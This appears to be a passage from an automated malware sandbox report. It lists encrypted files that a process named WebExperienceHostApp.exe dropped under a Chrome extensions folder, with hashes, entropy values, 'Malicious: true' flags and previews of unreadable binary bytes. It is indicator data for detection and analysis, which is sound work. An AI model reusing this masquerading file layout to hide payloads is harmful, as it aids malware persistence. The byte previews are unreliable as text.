SHA-512:	3E4BD8D2A0F81B6A83D58888F252976FC59A9764464DC23FD911E984E4B7CB61F20A6E48F53986170376EB10518EAE43058CF3FDA1CDEC31027BD2E33D4AA14E
Malicious:	true
Preview:	}...V\..k..>TXBc.F.M...{..J.-BZ.A:Y....BI.c[......+[5.v.t..D.u.^6..Y.$.....Q.t.H....k.L...v.t.5v.=.b..L...j]Edo.Z.\d.QN4[..].S\|.C...#.......{i.MHj...r....RE.1/.B...^J6.."...^. ....l.e5x6~9@.,Y.&..g.H,.D..K.`..u5[g...bZ.% f.......oQq..GL......F.Z&..Y....{.L...(Ako.8......:..&..$/...n...v[cy.M...L..M.q...a\|.....P.2Im.s........f."k..{......oe.<(G..8sp..S.Z.[.O..?.I]\|R?....w.n..j.....l.=..I...a.{...eJ.-..\|.O..h".?].7.'..>.......[.....g.e......b.y....8....b...\......=..L....X..A?...B+..)...s.4q..LT.lq.f.........~j.0n..Lox....[.....zdO%.Az.r.....i.-2A.....OA...1.Z..j....h........!G.....+. ...V...:.._....wM.gP....%.....E....h.).V.......t..f.V_..C..nO2..h.l......30(.ds...r6..ez."...F.x....U.y.....v7.h\|.N..7xC.2{y.b..0n.QIIRU..!.......V..W1i.=^..y.....-...T]..>9U9..q.Z..,.s....;.%hE...A.d....7.sb...p.....(3......G.h...m....W.hH5.jv.@*..DjV..+..y/.F.`..-...H..a7)...I.+......X..\|T.Y..{.......S.>)...n........dd.E.. 7I.Z.WUn._..d.D.mU.e..N...'..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.48

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	28032
Entropy (8bit):	7.992768273668832
Encrypted:	true
SSDEEP:	768:sPAPAuZEEvTcI+obiOwcV8dc+a1YrJAR0oyNPx:rLZZvlb1wcp+aY/LNPx
MD5:	9D8E43C6F6A0437CDC60634940ADE6B3
SHA1:	593F6EE506254CA335A8B3D20464FB785D4F14B9
SHA-256:	F50843C177C07596C5D13FC15523EE10D40E3EEE7E0181EDAE4F5F3667F9D730
SHA-512:	1031C252D0D77A580B1388249C213F7F2BDE5CE3AFE5E627425072A61340277846BB9C518C4835054125B31C94F1CFC49A1119BBD2B4B4EA80E450A389CC003C
Malicious:	true
Preview:	.P..M...o.........~.+.,,.....G.H..Ee..gP.mJ.A...D# ..z...............v..f9..;....H..s.);..1g.w.....I...@......o..<..n<so..-.'d......].&.%.7....A.6........TE......V.....)..~...S..,...6.~.2..DS7..{b[W.F&D..t..F].%v...g.-V...N+..@.....d..m.......1....6;....^_.M.b0PFl.)!?..3u.so.>v..U\|..Z..MO..Y3.. ..d.......)...&.,c.?.."w.,.`...%.'k.C.....>g.p....5..!...#I..8NXD(....iO..........$9....r1&..:..K.;...............v.@.h..t...J....N...i.B8m.m...m...`:..}sy...)b..38..avt...Y/&V..h.q....:U\F..YN.w.j..u...l..BI.^^....ax.".....o+...H..+...@....?.(..X.e....%..?..E.+\|..h..b...z.....K.......+...Dl..f..~{..2....}..U."./_....;A...@.ra...._$A....u.............Y..!6..u8.2w.T...5.....m...'nV........f.-._..0...G...U..v..rV......,Ov..,.4#.....l.Y...iH..P.P;{=5}..L...x......U.8..,2[T...m..a\.q.+.N....._.u8i.#d.4....!Yf.6...fd.'.tG..;>Wk..T..}..M.L..w..9.<:aLr..Ck>....O..*.n...%..CXf..z.x.......C{+H......$x.G....^....S..h.O...........@.1.=5

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.49

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	93294
Entropy (8bit):	7.9979775859394175
Encrypted:	true
SSDEEP:	1536:GXMMgrjGMVsyisWAOuxqJgMjQyPGsOCWftvuM7hmeK0PpGpmLM8sD8FXT:GXUHGMVsyifOCdjQyPdWftWM7hHGpmg0
MD5:	D156F2692D2595684BD3CE3EC5F37A38
SHA1:	7598E0FDB9A12AEF4C84421BF8B308AF82AE9A56
SHA-256:	80840A431D3021AA592E72BEE152CAE1AEBF2F81475692E02A7874481C2CD73B
SHA-512:	0E41534FE4FAC8BDD8E828BA98578BEAA281B1E356B9D1459DE67C09C346842A791A26FDC27A79F302F03CE8F16857CCB47B3E68593E8B99BD734B56A3FAF590
Malicious:	true
Preview:	.AI.m.......n+./.......K...Z.'_.-...l..'..M.....\|..6q...6M.s.Gb,..c....$m..e....6X\......La....Lq.F ."..>;..{d..r.n.~&....o-.j...........Cy.......%Y..M.... I..c...@.....\..9Y...D:3..4y.g+w.D.{$.t....W.Ts... .&.......?1.q....Hu@.6>b.tk.%A....Y.X..T./.L.f.c.....<..2...E..v..5.....Z.7.?Yn.c....;.[.._=....;3/.=HD..@.wE....b~..D....u..1.....Z7......"...0...g.X.s.4.y....je..m.d0[.. .n...1..X.x...55......1....{\..;T..... .h....0R..UD.8..(.B..x...\.cG..u.}8..g.o...k..@K.K.8M.)....\{..X........q.H.GO<..6......3..:...y.H.........#.4>h#j.r..M..?P{+...jx..?2.&..Z.7l.....]z.....c....XG#.muE9&..-I...w...+....]..YQ.......g.^..E.&/.)-.....,."....T.....t..6.y.h.........k.-0..N..^..jq....b0.--b.8.e..W.....C...9P4Hx;....v;.>.L.....cK....$t..:Ds...C.V.f.w........9.[.$).D......u.z..t.U4."F....%B8u ..`..yENe...q(.;..S.b.n.]\|4..N......y...c./1.....`&....V=}G.....s....F..nn...b..x.....!..~...3S.8>8.3]:.,........z......{..U...@2."i*%....]f...C..X...k...0r

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.5

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99237
Entropy (8bit):	7.998239611450476
Encrypted:	true
SSDEEP:	1536:v13/b24m8go97w69LJ10Mn+PKuIJFUt9d3igGf0JApvPbgsW7Q414LkY2:v1SI7w69LJH+yhJq3rG5pvTdQKwL
MD5:	C26CC642DD601D51D7A7DF598D64F699
SHA1:	A69260691F1E428E9378123112E748C94B3ABF10
SHA-256:	A991FC132AB623E18988A85999271634EB626C876847EEAA02E6F764E481BA0F
SHA-512:	5B86C7C06ED79D0DA84CDBBB1E75BD115926005C813FB008E5A865A8B2D1E0EAA885C52B2170B7186C7BAC9ABE05F56C4612A142CD67C92696B843CC6BB973F7
Malicious:	true
Preview:	..>..r.;B.`P.....\|....)N-..P......qF..S...H.s+.O...4\.$Y<.1R.~`..A.d..'k$.\E.._........=.gE..s.%..`.o..%....tO.....`..n...!.;Q....-.[-... ._.pX..N.ci.\|..zhO.T..N......H.&...H.[....0F..;.. Xg..9...y......kt..m.c..v.......#....xh..jiiV..9.(..>[.. P..M.Na}....1..\|......2......!.h..h.1..-.C...........^..S....C...^.j...{.J<t.!?..Q.%g..$y..g'.S?.i.Y&..0.J.'.'......&^.r}f.r..Y..{...._c....X....B....D..Qr./....v..1'... .k.,..{Y=..ww..M.!....._...l.Y..a-J.uA....".. ..t..k-..U...N N..D?. ..$. ..5.M.Sg...q.)..3U...V.N......m1....h..h`c_..,u.....V"........W...3......1.'....Lb....&.qW.p.q.gY.c(.[V.do.N..}..\|j.P..0...9..P..tv..r09.WZ..t.51N:/...2....{ .+.W..>L..(.@....4.n...q6..B;....1._.V.............Y...d....v...M...=........8..P.`..@sA.m.v..)..I\|........@.S.d!..c`....e)....kj.h .... ....A.VxUq.O<\.u...+D..9s..=..`..D....j.C{....Y...s...;....P.#9@..UO...\|3....2E..o0.D.w..4Na6c.C..P.L.....U!.......W*..N.%s.....7.]...>}...T.U[\|0.>..)U6....5..\......8

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	32837
Entropy (8bit):	7.994487964618717
Encrypted:	true
SSDEEP:	768:izMjA84o8RAiJpEHDEHMraBYYK+5E/pUdamy0fZgroff5eZWD:izMjANQizEHDiMrGK1Udv7fZson5P
MD5:	DB1FFB5BCE3851DDFA2EC50514B3B6A7
SHA1:	8EBCD38ED798C79B3389D1AA3030E7609C09BD9D
SHA-256:	34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
SHA-512:	B9AE84D09E7C4EFAFF2A8374A1627CFF54EB4A43BFE7C9938FBBF803407B5DC84DE953FBBDC628B9CB39EC8C5AB886CA4F8117A65F49CDE7D2CCA9F1F839C03D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 181_960.msi, Detection: malicious, Browse Filename: 232_786.msi, Detection: malicious, Browse Filename: zHsIxYcmJV.msi, Detection: malicious, Browse Filename: 18847_9.msi, Detection: malicious, Browse
Preview:	.$.:m.a.. Udh@.B...>2.......8+..(..+I.Q.....R]...T'..._...@ T....c;.E9:...3....e.;........Z.....+H..Z.!WXb.9.&...-.m..uP..o.....(.."...:.#r.9y...t.>..O.z....=.Z.D;...;;.....FY.A...T.C.......W..!9D.ob...EPW......;\|`.8R....&z.Qk.wz..w..[.....d...h..8.'..0.....C...!nm........}.....e.j..FL..>.e.V....hZ...:l........;m..W@.I.n.........B.9.u.1.t5=.!\|.+..Ci../...8.l}_ 2.M9.......e"..m....C...6.j.R.a..U.....n ........2.\....j{....:.+.F...l&.7..O.N....".zO.....}..]......\.RN.D...InW..X.J..E._t...e.n.R@..[.N-8......{....RY..\.E~.o.I../s............l.d.ZU..".-dt..\|`.A6.&.Z.4.Z".(5.'......'uCX..<6.......:..!...h.n.6Yl.>.....v.b..>..kb@.....<..PI...h+....f....j...2.L7D.Dt.@<....b.P.._..M.E..+5...o[..G...`Pj..J5f..^Z.S.....O........B...,;.............=UymZ..-1...M.1.E3....p.`&4...)..>W..w.o......QC.E+6.e).3..9...U`.._........r..GQ8QY.........y...*.7..bt.=..9..NB.$x.......Y.L...r..L.OZ.#y..5.?...c."&...;,h.P2&jF..y.X...f(..{...\h...'....'" .q.u....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.51

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	63988
Entropy (8bit):	7.997031990986062
Encrypted:	true
SSDEEP:	1536:9wlDRGx+2RCvu5IFZaHI2pyj1bEfSI8DWnubvzbsCHE:mlDRmsW5YotpOb88DWu/Ab
MD5:	4D5CC552AA2285B6B7A27976E589F607
SHA1:	20AA76BFC2A3877F87883C510F2D0E4A20136E32
SHA-256:	2899D6838DB152DF23B5F17F988160FC48F3973DA2DC9CF2BD3BFB029AF5A1C5
SHA-512:	43AC789C17312FB7BEB42E6CD7EF27EDC8841D7DAACED6DDE9A528F76782B571C5BE8384088094CF721A45DE54446D7DFF4556325E082D66B2600AFC8F9F7B1F
Malicious:	true
Preview:	Y...c...R.#..5.@.'..."...I.%..f....O8...9.....D..p.....NU..\.@B..p_..'..D.k.`]...xE.1...O8.@q...X.0..Y...,6..u^..C.j.A.oaS.{.]u.\|..E....O.b......z....d.S.H..&R..WK..s,H..s..epH.(b#:.X%.z.....t....Z..-..N.if>.....>_L...JH...Z...7....T.o..........?.1RFyu.....#.D..@8...}....`R..n3.E...@.gL>..a^....U:^..--P.7k-.A........O}....;.NC.d...<i.L\|..........`L............1..$Mk.u...9)....?Q.1V......C...P..I....1..-7#....N.< ..z\..`..8..u5.......A.SW..........-.3n+...x..Q...[U.....{.[....`r....gX.......q..aV.....=...]>y..Y.f.D.B.....6..........TC.>....ZzEM~jl..P....'r.t..r...P..Z..:O..bNZ?......Z.-...%.....~..yi...0..b.-...e..nI>.1?.[..........+.R.C.N.q.5w.......1..J.[.ZAM...%H.l......q...}U......./..e..w........[....2..L..C..=..jJ.k..S.IQ...k{.tM...E{d.].&.\.)..... .>.yO......(..}V#x.<.U..Z...'VZ`...C.~&.E.g....{..fJ...%..'.Ol..y.V...Cl....."..(J?.4/4#.....fIq.cs"JW.8q$J.8.....n...K\|.#......g....{)..p.w.qn.>J.Y..h........EZ<...<`.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.52

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	42334
Entropy (8bit):	7.994972834673255
Encrypted:	true
SSDEEP:	768:bsMNJmKf8DSbUkChIGEM4Q7sc8W4su3YE03jNR8KFnWDz51JKq6wu:bseJHIEVXp3YXlniz51JTFu
MD5:	F23A5FB6A22EC1A42CECBCCDEAFB27DF
SHA1:	E03C213DB03FBF91635B2D2693F0F0C5A319728E
SHA-256:	B67DB4FDE2BF13D2BB292AD6506A37DC48610A82EDC71F685253D67E248CF379
SHA-512:	360B130CD8FF166E936F2C21A6778161B7BAE0E8B8C2E1B2318CE851C3D891951E82B236559F7E256B084CA4A846A58441957D6A9B7FA34CEBC3120C49F8BC17
Malicious:	true
Preview:	.B.+`.....<]T..4k..........!....3.z..x...!.]=.........y..L.v~<.cT.C.....{..,....0N1{...=...f.{.1&.g+H.M......../.3%.O/.....A..c..."...k..I?&.b...3..I,^Z..5Z.l..~\.!.B0t...`.>\|e..X..T....kS..b~.D.?...+J....N...'m.F.....%VE.2Q.1.%h......}K6=X.r"<...{.....I.:j......%U].VS.n9L..M<...G.....BYi.J...k.QH+...m.....T...dc.~2A.79.=..-.^..@.W7...(qA../..8.$.i...l...G..,.l^.b.AR....(....I/l.`zI........Ex....I.....u.PSLC..z.....KC....p.s.........X.sJ....e......<.....f.....:b\|_..h.....{..GWa.\2....d.......lb.y.1c. fw.?.....ET=k.....1..].$...y.'#a...E@.tr.s..=......'.&H..@S}o.....j..MC..A .......t.4S.........T6..X(.A.....)z.W)..R....X....f0..~...\|Zw.,T6...'.K...iY..4.q..0.1e..).1..Re2!?.u.O}..C.x.5x{&.....yJ)K....@..........J~F...]...qNr.._..h.........Pi%VZ..g..o,..M.........k.M.3..e.!ef....\m\...N.y;..d..nhwfl..Bp\|..Z2.:YG.5...9p.=.u.....n...v......T.yA../4.?..<.Qs..3......??.q....2...x...i..........5.}>..kyY4.YE3F....K".C.[..f.@`

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.53

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98025
Entropy (8bit):	7.998074237488327
Encrypted:	true
SSDEEP:	1536:/kicEGiOnccTuHcesv+ZAWwttGj7/mOyb3kFRb4eDmolQX2IO/q15RVsK5mZfcs:/lcO8esWZ3w22Nb0FRbKEQX2IqK5mh/
MD5:	FC88C05D5B0283D962D13EA2EC177688
SHA1:	6C2DE92FA17C52F42211CE4C0FE9D22AEC382537
SHA-256:	E4465FE9F964359DC59F6508D73FFA017EFD4440E116E843B486F304BACC73CC
SHA-512:	127C3FE23A8EA58665E71682DD909B1E954562D1377281407B7056DD365A24A3575F6E21FBDAB9E2EEC992608E7E5CC5C3C43F801A078A1FE35D494BFCC8067F
Malicious:	true
Preview:	/.P3...E.{...b..&..{.A.6...:...f.S.8.`B....t".[q_.4..h...A...>....,.,....N.....F...e....7.`"W...x.Z..X...Cw.B$4.?R...<~...<...q-V.~..Bs...y..B..E....6..e.<,^^...'.K.Y...B...N.....<,......Q.d.3R..Q..X.ln(X.Z,IB.....sS<....?....[..!..c.E)r.....A..z..H.".x"@@.Qf..%).G..@..."8\|....U....y.k.H....V5j.V.....x)/..y.N= ~.hs[aZ..".c#...R.+,#...Jj'.8e.$s...Z..oX{.j..\|..O.'E...=.dY..).....%.U......T...._.......#<..ap.I`1,.L.TVs.S.".)..y..A{.@.'..<....$..(4...b-..)...)....I .9JrT.7......p0.&.u...0vA&qa...a..;....i.-..Db......@..o.....t.%.vG.. .......'%.>;A.6A...v.....'!}.$."9...%..k..\|....z...W....Q......>..>...H.....<.rXYW..."".....@.~Q\........\|.tI..M.\|A$E...2UF....H....m..eJ.p.%.9].(.=.k.3.j..1RU?4Y-.{.T.....e.!.A..+..'....+.].~....8........f..^E......[X..cj....(p..B..\|...6.Y.%:.......$..-/cg".[.R?C"}l....S.......,.OU..P..j.o...._H...w.1....z..Xy.........l.....8.Yl.N.h.m.;..!..\|........m`.h&..:................./.m[~.r+E.\.&...}rl. C. ...ek

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.54

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37714
Entropy (8bit):	7.995314097222126
Encrypted:	true
SSDEEP:	768:QAe3p4aYHCvf9SX8kkpTrtIreJdq5SjKiKVmx22bWaX2waTg:fe54aECX28kkp1dJagKiQm82H23k
MD5:	59C6178D0D65B782B2CEA581172D64C9
SHA1:	7AA2BA64047A3F7E72D92C11C572C442CD4C1702
SHA-256:	19664EF5B6D64266FD524121869D779D6C9138CAA55D28870B64FBD2D1EE9073
SHA-512:	1BF44F643FF22D91FCCEE38A4B5C9E21CED91D70651FB67272D660570EB9F0B02834A7F70C672D5D3D5C58BB86F9DC3F048C900AF99749CD90774ADA48073ECF
Malicious:	true
Preview:	DV...6V]H}.D.].Q.(.....i....l.(!..~}g.y...EP0.X..5..a.\|&A.J..g.#u.U#.'...=...............:x2u.._.iui.#.f~.b....f.Y..>..m...q.lC..8d....5..?A..5.7..,...q#............s.~=?6&Lg....z....tm1.e.g..#....N}~.Q...~wq...eI.b.N.;........e.....$s../E....\|..8i.m&..]........C.....Qw../.........E...l.<...P.+b...N..(.^S.M..X.. .T...'.....8..I)'......kk...v/.R-8..2....t.p..oA.r..6...HL.d{.oF...4.u.b.....o...d...h.0`E..oy.R{k>I-.I.`=..f_....q.n......oe:.>.'.=R..............S.H.J.?M.k.3.NW@...B.Dy.#T...Fi...^...E..+!..j..........p= ...U(.....M....h...I.C...!Um%..kk..W^.^@<'.=Ql.\.'....3.h.......f.(<.#..1.......K.7K....<,A.t......<cF....%.N]f....g.`u\|k..i...r.(........@W..}..d.{...F..b.I.LC..#Y.}.[..ejb.....w..L...]f.\|....pqK-........_<.B.}Z..Q..9.m..j.............U..D.J.W.\|....W.dQ#^..J....1n.t....W..l)....!..[O...p.......F...Y..y..6\|8.n0..g.$!@#.~E...;".>..5U.\9.......9....s..L.\....Fl...Nv....(..t.q..L`5.....9.?.....{.....-.:y...u.6....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.55

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	53045
Entropy (8bit):	7.996749714967816
Encrypted:	true
SSDEEP:	1536:vPyl56sgjNlbkbEzqYzTcduYfdjD5RZlvIQVwHWT1vYOb:Sl59EfkbOqYnuuwlvIB+h/b
MD5:	4ED8227029ED424E5273F4D8FFC0F7AD
SHA1:	F529AAA7917B29C4B6444ECB2E37608905017A07
SHA-256:	00A1089AFD9D8D0E1F2157B75556DC5F86A5D89C1571055FFE1901A0416A3C3F
SHA-512:	B7ADCD1DBBC1FC061F37053949AB2B903D830DB28514DD8E9E16561FFABF1313114F46127B07C2B0E3B9191CA88902E0F4FC4907DA6AAE264C9B302CDCA98F69
Malicious:	true
Preview:	..R.`..\..l..L5..W.'...VI'%..=>.O....".{Z]......Xq"h=F.=.../$..:3.M.q.h..-..C1u......D.....G...l...n.......d.3..K..o.....M!.[.6....>;p...q.a@R.hAZ4.P.....0.~[..u...9...H.O.f....q?.o.d.]..^.?.'.jK.........3:.Nr.v.t^T..S.Cj.'4Z9..uw...&....#...o.m...y.~.Iz.R-X...d.<.Q.......... ..L..#w..:....S..O...bt.U..?:3.A..e.}...}.uC.^i.$<.g....qO.UT....n^.....,c..Y"Su#....!.C$....M......k.._.=.....E...)q.mR12`.Wr...:h!......NyC%,&.:r..O....{...y..@."'..o..+..+w.k.0+.....ykD.\|Z.lo6..Z.._.......4..B..D...D.qc.H.=..p.FXxF.h..r...S..v.w..F.V......eF.\|....C....}{..H.!..G.;...U.9..Y.vwj..... ... .....b...b.G..xh..2..........9g.XA...r.,..gh..Y'..`...:"...........g....H.nVE...s6+.F......+.,^.l.z..%........o#...C.....#}.n....K........J.W.<.&..^.*.k.{.?......U-....a..y.1.._..Y...K^1.r.%q......W...?....6.v.P....;..r3....T........~c.by!!..f'./.'......W....]A].8m\.+.6q..E...h..c._.I.R....ul..`.^......w.J8....R.`.:...LK.8(]Z..u.?R..)..G-.9k...wV:g.a.e..Hb..>.uO...z_

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.56

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31197
Entropy (8bit):	7.9947487160338735
Encrypted:	true
SSDEEP:	768:w1n3Qf6+OtCQKM26WTuQu6RGvqgubHJkR2c/:wqSFtmMN36YyFkR2c/
MD5:	F8076A297C5D7DC010A796C47B16B247
SHA1:	C697BBD2827A3BA0E78033D5BD3575024060CC2B
SHA-256:	BC2DAE78F8E98687FFF4CB85C234023103FD8E5B3CB5791DFD314201A4765483
SHA-512:	CE84BFAE4952B64D81A772B53CAF8A27974923A717BAE517688B8A78CA542C2D7C430F499A08367C181C5246513B9063D75B716B73CFA196D99B780A745DF43E
Malicious:	true
Preview:	..?..c.h.[&......~..wZ....M.p.s&.......G..B....I..\v.k..T.....;..v/...W_5.K....Pv.....7..=.....5..#>gz0....s..ru.dO_...XGO.eUG?.U"(Xq..a..\|.....!..q...^...QA...l...Y.D.h.R ......s.........d..Sck...D...qa....f.A.d...).).....$(M.T)a..d...)s...N)..w.J..2^./..,..c.....Ed.u..'...+...!T.k...L s...a...)..1..#.~w.tZ..F....0u...>.Sft.K.1..\x.. yq.P.C.......P.E....k...I..."0.).....Q.k..Z{....e..i#<(.@.B...rw=k..Ni..y.IWBw.x........}y...M..%h.....n..#.r.,&:...\T~_.%x....Y...`m/P..9...Q......E.%.ft.....\|....I5...k.C^...b..#..,G.Y.Ve..=.^.\...].<...&.:."......)&..e...t.<....4<.:.@i.o...N.R..pI.W.u.WX.;...Sy...j...s..p..!..H..2...(.....x.H.=.A.\|c.+...!L...........j?.^o.....~e..e....@m.>........*..bU.?.ppI.......mL..).1G....E.l...q3......f.CE.X.:.C....$:..T.>n.'.A....L....ohb....9....$..C..E."f...h..!.L....v.G...yX.......7..RZ..E...#.b2.X.b.+..%..D......s..%.y....,A...A1...y./.{........m..`......c.F......G.D.....f...D(q5G.Z.<B.....^.%/Q./..{....Y.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.57

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98424
Entropy (8bit):	7.998284093395694
Encrypted:	true
SSDEEP:	3072:RbfZf1MdGn8q+n+r7y7N8uO//57yA5PJ6TdboeOmn64tB5p:tfZSdGn/o7KJPh6J0eOmnttZ
MD5:	D04D3B69DC546BE663E3CBF091B9A823
SHA1:	F3C11661D2FCC9BAB98A958AF9AAE2F8A0B626D5
SHA-256:	963C269A77DD52561168EF3F89D617851E305F3D292031DC6AE6F96B148F07AF
SHA-512:	AE90179356203F617687776E8358E619C3663ACAAE8A1AB2399D1AE861DAF6D23F7CAD6CA978BB9D625C189C5AAA9595C3E0031E7187355FD6C3F08A688DDAC6
Malicious:	true
Preview:	+\J..]ftT.[....Xm......a+.5Y...a..C.........1.>.......$c&.+.P......m..:.L.G...f 6.....v)...q.Y.@:.....}..V.R..e.9......\.E. ...b.....N.tHk.u3.`.L.E....c.u......jq..=_.......h...0... .D.eA.A.}....KP.oC..b1.dPq...b.....{....@..\|..P6....6...6$....6.;6S.s6.rO.a....?.;.Y14.....Iy.F..vD...W.../..v..r....z..t.R1.2...u.l&....>D'....6.V$y.....8.T.I..V.....7</t/L..LQQ.gm.1.0.9...'._L.`.dY..E tLs...Q..q.j.c.]+v..on.n.31u.v/^.../....Q......u....^..sD`....R3.....y..r..t........X\|.>..t.....g=.....wkOW.Y.d.L.G..F..Mo..sC.......< .I .......)\...Hu./.........\|...R.)..~t.P...0Y.."....fQQ.Nq...+..<...4..n...f..&=l...w....k....-n..a?Q9..o...].W'.S.gT.r;.h....O..Y'.vK.....)j...+.m=.&_E..sB..y$....."..D..N..a+..<..w..u7..c..G...&.d.p...s.../.i.J.#..L.......j&.r`..1.2..($Z..=.......t....4(/.K..D.>s.....7H..{..ab].e.Q.j.. o.!.wb=>L......M..?......g,.}....]..b.>.M...d..............bt?-..8.S.#W.i...Dcn.......W4.=../.....~6.+.>.}..........!.O.(.$..W.Y.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.58

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	23022
Entropy (8bit):	7.992462151837211
Encrypted:	true
SSDEEP:	384:UF0U4KO3dkZdhmTY4KjSnyKh+Yxz5rwtJBfgEE9cbU5H0f0fDA5++bJqEOes/gOT:UF0EWiZdhFL5KhbJe4EEubU5H04+bJXG
MD5:	1E86C96F528D9CAEAD6A160380F08A95
SHA1:	999520E27E7B2AAE8071C167DF024437D57EA16E
SHA-256:	5BD009392E87EF83B1F8CA8F29923441B3A9D56A8698B3CB04EB52448479DC1A
SHA-512:	56FC473827A6E3B3862B82954DC117053E5DC5E0D301FA166218C8F574F507AAA15C73FA741037EA03D088E2918316519661AA65A56B6068C99BAEF8AE97BFA8
Malicious:	true
Preview:	..........S.. .......z....q.L.4._.x9._S.......?;f..[...;.~..\|....8d..(..7Y~.f6v)...:(.....E5.7....._..Y.Nj...uq....H#m.JC.L...~._...., o\|:....R.?..N....<..f...$.8.l..H..p...-..x..i!.9...~.........L...(C.~..[...j.T...@....E.\|.<...q..'.......... ..{.Dc.............fR....>...e..K\|.4p}.z,....z..^......=..6Y..A...nJ...F<<^...BC......D..6.YP.JP..&~........f.v.tO..K.N..aNJ>..%RM.O>.../.}.~..Y.Q(..j.8p..`..[.......1......JL....p"...k.............!t....;`..+h.....B..g:..d.c....f....&...b.M0....l......O>.9>b.D..{.c.n..i6.....".X.P../D..u.u&..^=2..o...^.....`.S..n....&4..{....Ph.3......cn.0....c.S.Hx...Y.\|...b.........h...`gc{..>...a...g..;<M.4o..M.......F.......(.B...*..5.lL..u.Y.AF..`."j.H,...%^..].7v..0..&..2.L_.~....=M.^._.975.......!.JR&....$8..s......3e...>._2.g3N..x...H..v..f.5..e......E..)..NM..Ic...p../4.f.u>4...M..u.o\.jC...T..v{2..}.:...<$TTp.c.5..L\|.........Z.!.]e.......{@.hB..r....y"5.>..S_.m........\8...U.O;v.Ho5.=i?..(... .k..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.59

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32649
Entropy (8bit):	7.9940987497850395
Encrypted:	true
SSDEEP:	768:AH5QSuwhSPUsmZgxs2fAy0M0ffhJl3INRN6jdV62qpPbVKn4Qm:AZQSuw2Uxixiy0RffhJVK/6BQ2qpPbYU
MD5:	765583B8D57070F481B9FF33C521F610
SHA1:	D169ED2B10681C351A18D9C1A07072F883CE07E7
SHA-256:	3B4B05C095909D0E1D1D1C98B956D7A53027FC1E4A13CEAFE31EE69DAE5E5E79
SHA-512:	7216F908A0503BE352DF51727CBC3E6202731633E40D1D161A373A2AB8650D57711AEFEB115C8559075876795CF346EAE6E61CE90839DAD6231650F15CCC7028
Malicious:	true
Preview:	Qq..zI.(..T.+8..."..\{9.N..iFd.%..(.71s.Z.:.q..}.$....>..pSM...!...\|N...D.I!.....N'(....}5e....k.x.nX..+c.5..U....?..$.../rc.. ..r.jE"...sgQj.h..K..D..4.%N ....$...s..~K...}x.1.....}.^l.V{......pC...KKbZ.^B.>z../U....z.>.W..:=...$M...!.KS.........S..s.7..U.Q.8.....M#&..z..ru...).../.J8..E..?..i?^(..e.QZa.Ot.9.{3.;ynv.t(.`..T.t..../.U.#.6..1..]dcj.\....8.%H9.....y.(..g .;v.....7...YT.C..'...@?........{..YB.;.na4.D.v.4:....Cz.-D...E.ZG...v...<:.D..... ...&VU....P...M.5.v....B3.Mj.t~.p....q.8..07F#b..g(H.gA.XW1Q&....1W..q.m3MbV?P@,...=a_'.C.Tk."..wD..0D.s....Z}.0..i..<.=.Q.....6.-b..S\|..Q..k..d.4q....}..].8....%.Jm0....&.&.o.....Jw.N.....`..H.r8v.L._&6_;..}....$'GTF_..e.T.8j..CQ0....\|..{..&.}+.Y"'Xr...crK..$..."..X..l.A.....Y.D...P.b..7F.U.];O...<.5!..E?U.GqO.-..}.%n..........3...v.^.,.\|.<.z..#.r.J..T.G..3...YL.<M.!.....ks.=....Leb]N...t..(m.={..?..3.T;?.2.0..,..Z...R..QeGa.........!.K.6. ..E.c..93.gn.y...9U..U..}.......J...............i

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.6

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	119703
Entropy (8bit):	7.998457615659725
Encrypted:	true
SSDEEP:	3072:SRW37oosCPScHmZMQR0CxmFb/o85m6CPioYPJXK2:LEonDeMQEe85m6CioYPJ62
MD5:	40DB062CECEEB8D2D1F462C905FCF24B
